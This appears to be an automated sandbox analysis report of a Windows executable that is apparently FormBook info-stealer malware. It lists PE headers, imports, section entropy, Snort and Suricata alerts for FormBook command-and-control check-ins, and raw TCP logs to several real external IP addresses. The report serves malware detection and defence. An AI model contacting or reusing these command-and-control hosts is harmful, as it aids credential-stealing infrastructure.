                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          nop word ptr [eax+eax+00000000h]
                          dec eax
                          cmp ecx, dword ptr [001698C9h]
                          jne 00007FB9307CA322h
                          dec eax
                          rol ecx, 10h
                          test cx, FFFFh
                          jne 00007FB9307CA313h
                          ret
                          dec eax
                          ror ecx, 00000000h

                          Rich Headers

                          Programming Language:
                          • [IMP] VS2008 SP1 build 30729

                          Data Directories

                          NameVirtual AddressVirtual Size Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT0x1c6d000x34.rdata
                          IMAGE_DIRECTORY_ENTRY_IMPORT0x1c6d340xf0.rdata
                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x1e80000x42f2c.rsrc
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x1d70000x107c4.pdata
                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x22b0000x574.reloc
                          IMAGE_DIRECTORY_ENTRY_DEBUG0x1a4fb00x1c.rdata
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                          IMAGE_DIRECTORY_ENTRY_TLS0x1a51800x28.rdata
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1a4e700x140.rdata
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IAT0x1590000x738.rdata
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                          Sections

                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                          .text0x10000x655e80x6560006d93d7c40e01c1300f6826c879558b6False0.4591360974106042data6.658242031189929IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          .managed0x670000xb1ba80xb1c00f2ee50ef03eb60f92e5431d11901f336False0.4627670094936709data6.453982445298983IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          hydrated0x1190000x3f0c80x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .rdata0x1590000x6f78a0x6f80055350dd21c6c3ce1a99f3242d5dead9fFalse0.4843531039798206data6.511308033767351IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .data0x1c90000xd4480x1800b73d85394fcbb4f8e302620aa18de2a0False0.205078125data2.9410741871914508IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .pdata0x1d70000x107c40x10800d4aa8ab84ce58ce8b0368a1da3459918False0.4968039772727273data6.140879273828546IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .rsrc0x1e80000x42f2c0x43000391c798eca5d145cc6ce69cf928cfc06False0.996767869636194data7.998334767119872IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .reloc0x22b0000x5740x6000bd5f65d59a22905486c6cac1480bcf3False0.5944010416666666data5.180551038470706IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                          Resources

                          NameRVASizeTypeLanguageCountryZLIB Complexity
                          BINARY0x1e81300x42884data1.0003339253475025
                          RT_VERSION0x22a9b40x38cPGP symmetric key encrypted data - Plaintext or unencrypted data0.3634361233480176
                          RT_MANIFEST0x22ad400x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                          Imports

                          DLLImport
                          ADVAPI32.dllAdjustTokenPrivileges, CreateWellKnownSid, DeregisterEventSource, DuplicateTokenEx, GetSecurityDescriptorLength, GetTokenInformation, GetWindowsAccountDomainSid, LookupPrivilegeValueW, OpenProcessToken, OpenThreadToken, RegCloseKey, RegCreateKeyExW, RegDeleteKeyExW, RegDeleteTreeW, RegDeleteValueW, RegEnumKeyExW, RegEnumValueW, RegFlushKey, RegOpenKeyExW, RegQueryInfoKeyW, RegQueryValueExW, RegSetValueExA, RegSetValueExW, RegisterEventSourceW, ReportEventW, RevertToSelf, SetThreadToken
                          bcrypt.dllBCryptCloseAlgorithmProvider, BCryptDecrypt, BCryptDestroyKey, BCryptGenRandom, BCryptGenerateSymmetricKey, BCryptOpenAlgorithmProvider
                          KERNEL32.dllTlsFree, TlsSetValue, TlsGetValue, TlsAlloc, InitializeCriticalSectionAndSpinCount, EncodePointer, RaiseException, AllocConsole, CancelThreadpoolIo, CloseHandle, CloseThreadpoolIo, CopyFileExW, CreateDirectoryW, CreateEventExW, CreateFileW, CreateProcessA, CreateSymbolicLinkW, CreateThreadpoolIo, DeleteCriticalSection, DeleteFileW, DeleteVolumeMountPointW, DeviceIoControl, DuplicateHandle, EnterCriticalSection, ExitProcess, ExpandEnvironmentStringsW, FileTimeToSystemTime, FindClose, FindFirstFileExW, FindNextFileW, FormatMessageW, FreeConsole, FreeLibrary, GetCPInfo, GetConsoleOutputCP, GetConsoleWindow, GetCurrentProcess, GetCurrentProcessId, GetCurrentProcessorNumberEx, GetCurrentThread, GetDynamicTimeZoneInformation, GetEnvironmentVariableW, GetFileAttributesExW, GetFileInformationByHandle, GetFileInformationByHandleEx, GetFileType, GetFinalPathNameByHandleW, GetFullPathNameW, GetLastError, GetLogicalDrives, GetLongPathNameW, GetModuleFileNameW, GetModuleHandleA, GetOverlappedResult, GetProcAddress, GetStdHandle, GetSystemTime, GetThreadPriority, GetTickCount64, GetTimeZoneInformation, GetVolumeInformationW, InitializeConditionVariable, InitializeCriticalSection, IsDebuggerPresent, LeaveCriticalSection, LoadLibraryExW, LocalAlloc, LocalFree, MoveFileExW, MultiByteToWideChar, QueryPerformanceCounter, QueryPerformanceFrequency, RaiseFailFastException, ReadFile, RemoveDirectoryW, ReplaceFileW, ResetEvent, ResumeThread, SetEvent, SetFileAttributesW, SetFileInformationByHandle, SetLastError, SetThreadErrorMode, SetThreadPriority, Sleep, SleepConditionVariableCS, StartThreadpoolIo, SystemTimeToFileTime, TzSpecificLocalTimeToSystemTime, VirtualAlloc, VirtualFree, WaitForMultipleObjectsEx, WakeConditionVariable, WideCharToMultiByte, WriteFile, FlushProcessWriteBuffers, WaitForSingleObjectEx, RtlVirtualUnwind, RtlCaptureContext, RtlRestoreContext, VerSetConditionMask, AddVectoredExceptionHandler, FlsAlloc, FlsGetValue, FlsSetValue, CreateEventW, SwitchToThread, CreateThread, GetCurrentThreadId, SuspendThread, GetThreadContext, SetThreadContext, QueryInformationJobObject, GetModuleHandleW, GetModuleHandleExW, GetProcessAffinityMask, VerifyVersionInfoW, InitializeContext, GetEnabledXStateFeatures, SetXStateFeaturesMask, VirtualQuery, GetSystemTimeAsFileTime, InitializeCriticalSectionEx, DebugBreak, WaitForSingleObject, SleepEx, GlobalMemoryStatusEx, GetSystemInfo, GetLogicalProcessorInformation, GetLogicalProcessorInformationEx, GetLargePageMinimum, VirtualUnlock, VirtualAllocExNuma, IsProcessInJob, GetNumaHighestNodeNumber, GetProcessGroupAffinity, K32GetProcessMemoryInfo, RtlPcToFileHeader, RtlUnwindEx, InitializeSListHead, IsProcessorFeaturePresent, TerminateProcess, SetUnhandledExceptionFilter, UnhandledExceptionFilter, RtlLookupFunctionEntry
                          ole32.dllCoInitializeEx, CoUninitialize, CoCreateGuid, CoTaskMemAlloc, CoGetApartmentType, CoTaskMemFree, CoWaitForMultipleHandles
                          api-ms-win-crt-math-l1-1-0.dllceil, modf, __setusermatherr
                          api-ms-win-crt-heap-l1-1-0.dll_set_new_mode, free, _callnewh, calloc, malloc
                          api-ms-win-crt-string-l1-1-0.dllstrcmp, _stricmp, wcsncmp, strcpy_s
                          api-ms-win-crt-convert-l1-1-0.dllstrtoull
                          api-ms-win-crt-runtime-l1-1-0.dll_crt_atexit, _register_onexit_function, _initialize_onexit_table, abort, terminate, _register_thread_local_exe_atexit_callback, _c_exit, _seh_filter_exe, _set_app_type, _configure_wide_argv, _initialize_wide_environment, _get_initial_wide_environment, __p___wargv, _initterm_e, exit, _exit, _cexit, __p___argc, _initterm
                          api-ms-win-crt-stdio-l1-1-0.dll_set_fmode, __p__commode
                          api-ms-win-crt-locale-l1-1-0.dll_configthreadlocale

                          Network Behavior

                          Snort IDS Alerts

                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                          07/18/24-08:16:35.708258TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34971680192.168.2.943.155.26.241
                          07/18/24-08:15:55.343618TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24970980192.168.2.923.227.38.74
                          07/18/24-08:18:13.794575TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24973080192.168.2.9108.179.193.98
                          07/18/24-08:18:08.711636TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34972880192.168.2.9108.179.193.98
                          07/18/24-08:18:38.635194TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34973280192.168.2.935.241.34.216
                          07/18/24-08:16:22.150762TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34971280192.168.2.984.32.84.101
                          07/18/24-08:19:02.667403TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34973980192.168.2.9154.92.52.196
                          07/18/24-08:17:07.218585TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34971980192.168.2.93.33.130.190
                          07/18/24-08:17:55.148563TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34972480192.168.2.9203.161.55.102
                          07/18/24-08:19:05.208740TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34974080192.168.2.9154.92.52.196
                          07/18/24-08:17:15.304574TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24972280192.168.2.93.33.130.190
                          07/18/24-08:18:06.178094TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34972780192.168.2.9108.179.193.98
                          07/18/24-08:18:51.948964TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34973680192.168.2.974.208.46.171
                          07/18/24-08:18:57.038338TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24973880192.168.2.974.208.46.171
                          07/18/24-08:17:09.840500TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34972080192.168.2.93.33.130.190
                          07/18/24-08:16:40.771371TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24971880192.168.2.943.155.26.241
                          07/18/24-08:18:49.409930TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34973580192.168.2.974.208.46.171
                          07/18/24-08:18:36.102586TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34973180192.168.2.935.241.34.216
                          07/18/24-08:16:27.240205TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24971480192.168.2.984.32.84.101
                          07/18/24-08:16:33.167058TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34971580192.168.2.943.155.26.241
                          07/18/24-08:16:19.614946TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34971180192.168.2.984.32.84.101
                          07/18/24-08:17:52.606554TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34972380192.168.2.9203.161.55.102
                          07/18/24-08:19:10.273647TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24974280192.168.2.9154.92.52.196
                          07/18/24-08:18:00.211462TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24972680192.168.2.9203.161.55.102
                          07/18/24-08:18:43.710583TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24973480192.168.2.935.241.34.216

                          Suricata IDS Alerts

                          TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                          2024-07-18T08:18:14.453133+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M54973080192.168.2.9108.179.193.98
                          2024-07-18T08:18:57.570305+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M54973880192.168.2.974.208.46.171
                          2024-07-18T08:18:11.881553+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M34972980192.168.2.9108.179.193.98
                          2024-07-18T08:17:02.163543+0200TCP2855465ETPRO MALWARE FormBook CnC Checkin (GET) M24971880192.168.2.943.155.26.241
                          2024-07-18T08:18:44.354120+0200TCP2855465ETPRO MALWARE FormBook CnC Checkin (GET) M24973480192.168.2.935.241.34.216
                          2024-07-18T08:17:58.293086+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M34972580192.168.2.9203.161.55.102
                          2024-07-18T08:16:39.745635+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M34971780192.168.2.943.155.26.241
                          2024-07-18T08:19:11.204667+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M54974280192.168.2.9154.92.52.196
                          2024-07-18T08:18:41.801176+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M34973380192.168.2.935.241.34.216
                          2024-07-18T08:17:47.252891+0200TCP2855465ETPRO MALWARE FormBook CnC Checkin (GET) M24972280192.168.2.93.33.130.190
                          2024-07-18T08:17:47.252891+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M54972280192.168.2.93.33.130.190
                          2024-07-18T08:16:20.079013+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M34971180192.168.2.984.32.84.101
                          2024-07-18T08:17:55.756640+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M34972480192.168.2.9203.161.55.102
                          2024-07-18T08:18:57.570305+0200TCP2855465ETPRO MALWARE FormBook CnC Checkin (GET) M24973880192.168.2.974.208.46.171
                          2024-07-18T08:17:12.847063+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M34972180192.168.2.93.33.130.190
                          2024-07-18T08:16:27.704677+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M54971480192.168.2.984.32.84.101
                          2024-07-18T08:17:07.672872+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M34971980192.168.2.93.33.130.190
                          2024-07-18T08:18:55.043396+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M34973780192.168.2.974.208.46.171
                          2024-07-18T08:16:22.641237+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M34971280192.168.2.984.32.84.101
                          2024-07-18T08:19:06.130591+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M34974080192.168.2.9154.92.52.196
                          2024-07-18T08:19:03.581277+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M34973980192.168.2.9154.92.52.196
                          2024-07-18T08:18:06.824901+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M34972780192.168.2.9108.179.193.98
                          2024-07-18T08:19:08.617677+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M34974180192.168.2.9154.92.52.196
                          2024-07-18T08:18:14.453133+0200TCP2855465ETPRO MALWARE FormBook CnC Checkin (GET) M24973080192.168.2.9108.179.193.98
                          2024-07-18T08:18:52.810773+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M34973680192.168.2.974.208.46.171
                          2024-07-18T08:17:02.163543+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M54971880192.168.2.943.155.26.241
                          2024-07-18T08:18:44.354120+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M54973480192.168.2.935.241.34.216
                          2024-07-18T08:18:49.928508+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M34973580192.168.2.974.208.46.171
                          2024-07-18T08:18:00.826691+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M54972680192.168.2.9203.161.55.102
                          2024-07-18T08:17:53.209829+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M34972380192.168.2.9203.161.55.102
                          2024-07-18T08:15:55.872871+0200TCP2855465ETPRO MALWARE FormBook CnC Checkin (GET) M24970980192.168.2.923.227.38.74
                          2024-07-18T08:16:37.214368+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M34971680192.168.2.943.155.26.241
                          2024-07-18T08:16:25.187168+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M34971380192.168.2.984.32.84.101
                          2024-07-18T08:18:09.326768+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M34972880192.168.2.9108.179.193.98
                          2024-07-18T08:18:39.270968+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M34973280192.168.2.935.241.34.216
                          2024-07-18T08:17:11.356835+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M34972080192.168.2.93.33.130.190
                          2024-07-18T08:18:00.826691+0200TCP2855465ETPRO MALWARE FormBook CnC Checkin (GET) M24972680192.168.2.9203.161.55.102
                          2024-07-18T08:19:11.204667+0200TCP2855465ETPRO MALWARE FormBook CnC Checkin (GET) M24974280192.168.2.9154.92.52.196
                          2024-07-18T08:16:34.683122+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M34971580192.168.2.943.155.26.241
                          2024-07-18T08:18:36.737717+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M34973180192.168.2.935.241.34.216
                          2024-07-18T08:15:55.872871+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M54970980192.168.2.923.227.38.74
                          2024-07-18T08:16:27.704677+0200TCP2855465ETPRO MALWARE FormBook CnC Checkin (GET) M24971480192.168.2.984.32.84.101

                          Network Port Distribution

                          TCP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          Jul 18, 2024 08:15:55.335122108 CEST4970980192.168.2.923.227.38.74
                          Jul 18, 2024 08:15:55.340930939 CEST804970923.227.38.74192.168.2.9
                          Jul 18, 2024 08:15:55.341038942 CEST4970980192.168.2.923.227.38.74
                          Jul 18, 2024 08:15:55.343617916 CEST4970980192.168.2.923.227.38.74
                          Jul 18, 2024 08:15:55.348696947 CEST804970923.227.38.74192.168.2.9
                          Jul 18, 2024 08:15:55.872169018 CEST804970923.227.38.74192.168.2.9
                          Jul 18, 2024 08:15:55.872703075 CEST804970923.227.38.74192.168.2.9
                          Jul 18, 2024 08:15:55.872870922 CEST4970980192.168.2.923.227.38.74
                          Jul 18, 2024 08:15:55.877338886 CEST804970923.227.38.74192.168.2.9
                          Jul 18, 2024 08:15:55.877490997 CEST4970980192.168.2.923.227.38.74
                          Jul 18, 2024 08:15:55.879369974 CEST4970980192.168.2.923.227.38.74
                          Jul 18, 2024 08:15:55.893800974 CEST804970923.227.38.74192.168.2.9
                          Jul 18, 2024 08:16:19.608073950 CEST4971180192.168.2.984.32.84.101
                          Jul 18, 2024 08:16:19.612848043 CEST804971184.32.84.101192.168.2.9
                          Jul 18, 2024 08:16:19.612931967 CEST4971180192.168.2.984.32.84.101
                          Jul 18, 2024 08:16:19.614945889 CEST4971180192.168.2.984.32.84.101
                          Jul 18, 2024 08:16:19.619847059 CEST804971184.32.84.101192.168.2.9
                          Jul 18, 2024 08:16:20.078794003 CEST804971184.32.84.101192.168.2.9
                          Jul 18, 2024 08:16:20.078949928 CEST804971184.32.84.101192.168.2.9
                          Jul 18, 2024 08:16:20.079013109 CEST4971180192.168.2.984.32.84.101
                          Jul 18, 2024 08:16:21.121957064 CEST4971180192.168.2.984.32.84.101
                          Jul 18, 2024 08:16:22.139050961 CEST4971280192.168.2.984.32.84.101
                          Jul 18, 2024 08:16:22.144167900 CEST804971284.32.84.101192.168.2.9
                          Jul 18, 2024 08:16:22.144305944 CEST4971280192.168.2.984.32.84.101
                          Jul 18, 2024 08:16:22.150762081 CEST4971280192.168.2.984.32.84.101
                          Jul 18, 2024 08:16:22.155988932 CEST804971284.32.84.101192.168.2.9
                          Jul 18, 2024 08:16:22.640935898 CEST804971284.32.84.101192.168.2.9
                          Jul 18, 2024 08:16:22.641160011 CEST804971284.32.84.101192.168.2.9
                          Jul 18, 2024 08:16:22.641237020 CEST4971280192.168.2.984.32.84.101
                          Jul 18, 2024 08:16:23.667503119 CEST4971280192.168.2.984.32.84.101
                          Jul 18, 2024 08:16:24.686373949 CEST4971380192.168.2.984.32.84.101
                          Jul 18, 2024 08:16:24.702877998 CEST804971384.32.84.101192.168.2.9
                          Jul 18, 2024 08:16:24.703046083 CEST4971380192.168.2.984.32.84.101
                          Jul 18, 2024 08:16:24.709618092 CEST4971380192.168.2.984.32.84.101
                          Jul 18, 2024 08:16:24.714657068 CEST804971384.32.84.101192.168.2.9
                          Jul 18, 2024 08:16:24.714670897 CEST804971384.32.84.101192.168.2.9
                          Jul 18, 2024 08:16:25.186525106 CEST804971384.32.84.101192.168.2.9
                          Jul 18, 2024 08:16:25.187079906 CEST804971384.32.84.101192.168.2.9
                          Jul 18, 2024 08:16:25.187167883 CEST4971380192.168.2.984.32.84.101
                          Jul 18, 2024 08:16:26.214330912 CEST4971380192.168.2.984.32.84.101
                          Jul 18, 2024 08:16:27.232944012 CEST4971480192.168.2.984.32.84.101
                          Jul 18, 2024 08:16:27.238221884 CEST804971484.32.84.101192.168.2.9
                          Jul 18, 2024 08:16:27.238370895 CEST4971480192.168.2.984.32.84.101
                          Jul 18, 2024 08:16:27.240205050 CEST4971480192.168.2.984.32.84.101
                          Jul 18, 2024 08:16:27.245079994 CEST804971484.32.84.101192.168.2.9
                          Jul 18, 2024 08:16:27.703633070 CEST804971484.32.84.101192.168.2.9
                          Jul 18, 2024 08:16:27.704530001 CEST804971484.32.84.101192.168.2.9
                          Jul 18, 2024 08:16:27.704540968 CEST804971484.32.84.101192.168.2.9
                          Jul 18, 2024 08:16:27.704677105 CEST4971480192.168.2.984.32.84.101
                          Jul 18, 2024 08:16:27.707205057 CEST4971480192.168.2.984.32.84.101
                          Jul 18, 2024 08:16:27.713900089 CEST804971484.32.84.101192.168.2.9
                          Jul 18, 2024 08:16:33.159414053 CEST4971580192.168.2.943.155.26.241
                          Jul 18, 2024 08:16:33.164525986 CEST804971543.155.26.241192.168.2.9
                          Jul 18, 2024 08:16:33.164637089 CEST4971580192.168.2.943.155.26.241
                          Jul 18, 2024 08:16:33.167057991 CEST4971580192.168.2.943.155.26.241
                          Jul 18, 2024 08:16:33.171988964 CEST804971543.155.26.241192.168.2.9
                          Jul 18, 2024 08:16:34.683121920 CEST4971580192.168.2.943.155.26.241
                          Jul 18, 2024 08:16:34.729157925 CEST804971543.155.26.241192.168.2.9
                          Jul 18, 2024 08:16:35.701529980 CEST4971680192.168.2.943.155.26.241
                          Jul 18, 2024 08:16:35.706451893 CEST804971643.155.26.241192.168.2.9
                          Jul 18, 2024 08:16:35.706552029 CEST4971680192.168.2.943.155.26.241
                          Jul 18, 2024 08:16:35.708257914 CEST4971680192.168.2.943.155.26.241
                          Jul 18, 2024 08:16:35.713188887 CEST804971643.155.26.241192.168.2.9
                          Jul 18, 2024 08:16:37.214368105 CEST4971680192.168.2.943.155.26.241
                          Jul 18, 2024 08:16:37.261219025 CEST804971643.155.26.241192.168.2.9
                          Jul 18, 2024 08:16:38.232844114 CEST4971780192.168.2.943.155.26.241
                          Jul 18, 2024 08:16:38.238434076 CEST804971743.155.26.241192.168.2.9
                          Jul 18, 2024 08:16:38.238575935 CEST4971780192.168.2.943.155.26.241
                          Jul 18, 2024 08:16:38.240376949 CEST4971780192.168.2.943.155.26.241
                          Jul 18, 2024 08:16:38.245676041 CEST804971743.155.26.241192.168.2.9
                          Jul 18, 2024 08:16:38.245894909 CEST804971743.155.26.241192.168.2.9
                          Jul 18, 2024 08:16:39.745635033 CEST4971780192.168.2.943.155.26.241
                          Jul 18, 2024 08:16:39.797272921 CEST804971743.155.26.241192.168.2.9
                          Jul 18, 2024 08:16:40.764537096 CEST4971880192.168.2.943.155.26.241
                          Jul 18, 2024 08:16:40.769467115 CEST804971843.155.26.241192.168.2.9
                          Jul 18, 2024 08:16:40.769556046 CEST4971880192.168.2.943.155.26.241
                          Jul 18, 2024 08:16:40.771370888 CEST4971880192.168.2.943.155.26.241
                          Jul 18, 2024 08:16:40.776576042 CEST804971843.155.26.241192.168.2.9
                          Jul 18, 2024 08:16:54.556715012 CEST804971543.155.26.241192.168.2.9
                          Jul 18, 2024 08:16:54.556822062 CEST4971580192.168.2.943.155.26.241
                          Jul 18, 2024 08:16:57.076055050 CEST804971643.155.26.241192.168.2.9
                          Jul 18, 2024 08:16:57.076406956 CEST4971680192.168.2.943.155.26.241
                          Jul 18, 2024 08:16:59.600429058 CEST804971743.155.26.241192.168.2.9
                          Jul 18, 2024 08:16:59.600498915 CEST4971780192.168.2.943.155.26.241
                          Jul 18, 2024 08:17:02.163413048 CEST804971843.155.26.241192.168.2.9
                          Jul 18, 2024 08:17:02.163542986 CEST4971880192.168.2.943.155.26.241
                          Jul 18, 2024 08:17:02.164645910 CEST4971880192.168.2.943.155.26.241
                          Jul 18, 2024 08:17:02.170032024 CEST804971843.155.26.241192.168.2.9
                          Jul 18, 2024 08:17:07.209494114 CEST4971980192.168.2.93.33.130.190
                          Jul 18, 2024 08:17:07.215492964 CEST80497193.33.130.190192.168.2.9
                          Jul 18, 2024 08:17:07.215806961 CEST4971980192.168.2.93.33.130.190
                          Jul 18, 2024 08:17:07.218585014 CEST4971980192.168.2.93.33.130.190
                          Jul 18, 2024 08:17:07.232430935 CEST80497193.33.130.190192.168.2.9
                          Jul 18, 2024 08:17:07.672807932 CEST80497193.33.130.190192.168.2.9
                          Jul 18, 2024 08:17:07.672872066 CEST4971980192.168.2.93.33.130.190
                          Jul 18, 2024 08:17:08.730571985 CEST4971980192.168.2.93.33.130.190
                          Jul 18, 2024 08:17:08.735521078 CEST80497193.33.130.190192.168.2.9
                          Jul 18, 2024 08:17:09.748648882 CEST4972080192.168.2.93.33.130.190
                          Jul 18, 2024 08:17:09.838207006 CEST80497203.33.130.190192.168.2.9
                          Jul 18, 2024 08:17:09.838375092 CEST4972080192.168.2.93.33.130.190
                          Jul 18, 2024 08:17:09.840500116 CEST4972080192.168.2.93.33.130.190
                          Jul 18, 2024 08:17:09.845412016 CEST80497203.33.130.190192.168.2.9
                          Jul 18, 2024 08:17:11.356834888 CEST4972080192.168.2.93.33.130.190
                          Jul 18, 2024 08:17:11.362351894 CEST80497203.33.130.190192.168.2.9
                          Jul 18, 2024 08:17:11.366200924 CEST4972080192.168.2.93.33.130.190
                          Jul 18, 2024 08:17:12.374613047 CEST4972180192.168.2.93.33.130.190
                          Jul 18, 2024 08:17:12.379810095 CEST80497213.33.130.190192.168.2.9
                          Jul 18, 2024 08:17:12.379909992 CEST4972180192.168.2.93.33.130.190
                          Jul 18, 2024 08:17:12.382019997 CEST4972180192.168.2.93.33.130.190
                          Jul 18, 2024 08:17:12.386931896 CEST80497213.33.130.190192.168.2.9
                          Jul 18, 2024 08:17:12.387090921 CEST80497213.33.130.190192.168.2.9
                          Jul 18, 2024 08:17:12.846986055 CEST80497213.33.130.190192.168.2.9
                          Jul 18, 2024 08:17:12.847063065 CEST4972180192.168.2.93.33.130.190
                          Jul 18, 2024 08:17:13.886296034 CEST4972180192.168.2.93.33.130.190
                          Jul 18, 2024 08:17:13.891397953 CEST80497213.33.130.190192.168.2.9
                          Jul 18, 2024 08:17:14.904736996 CEST4972280192.168.2.93.33.130.190
                          Jul 18, 2024 08:17:15.299384117 CEST80497223.33.130.190192.168.2.9
                          Jul 18, 2024 08:17:15.300934076 CEST4972280192.168.2.93.33.130.190
                          Jul 18, 2024 08:17:15.304574013 CEST4972280192.168.2.93.33.130.190
                          Jul 18, 2024 08:17:15.309638023 CEST80497223.33.130.190192.168.2.9
                          Jul 18, 2024 08:17:47.252397060 CEST80497223.33.130.190192.168.2.9
                          Jul 18, 2024 08:17:47.252716064 CEST80497223.33.130.190192.168.2.9
                          Jul 18, 2024 08:17:47.252891064 CEST4972280192.168.2.93.33.130.190
                          Jul 18, 2024 08:17:47.255429029 CEST4972280192.168.2.93.33.130.190
                          Jul 18, 2024 08:17:47.260426044 CEST80497223.33.130.190192.168.2.9
                          Jul 18, 2024 08:17:52.596467972 CEST4972380192.168.2.9203.161.55.102
                          Jul 18, 2024 08:17:52.601967096 CEST8049723203.161.55.102192.168.2.9
                          Jul 18, 2024 08:17:52.602664948 CEST4972380192.168.2.9203.161.55.102
                          Jul 18, 2024 08:17:52.606554031 CEST4972380192.168.2.9203.161.55.102
                          Jul 18, 2024 08:17:52.611483097 CEST8049723203.161.55.102192.168.2.9
                          Jul 18, 2024 08:17:53.209460974 CEST8049723203.161.55.102192.168.2.9
                          Jul 18, 2024 08:17:53.209685087 CEST8049723203.161.55.102192.168.2.9
                          Jul 18, 2024 08:17:53.209829092 CEST4972380192.168.2.9203.161.55.102
                          Jul 18, 2024 08:17:54.120896101 CEST4972380192.168.2.9203.161.55.102
                          Jul 18, 2024 08:17:55.139121056 CEST4972480192.168.2.9203.161.55.102
                          Jul 18, 2024 08:17:55.144200087 CEST8049724203.161.55.102192.168.2.9
                          Jul 18, 2024 08:17:55.144644976 CEST4972480192.168.2.9203.161.55.102
                          Jul 18, 2024 08:17:55.148562908 CEST4972480192.168.2.9203.161.55.102
                          Jul 18, 2024 08:17:55.159688950 CEST8049724203.161.55.102192.168.2.9
                          Jul 18, 2024 08:17:55.756464005 CEST8049724203.161.55.102192.168.2.9
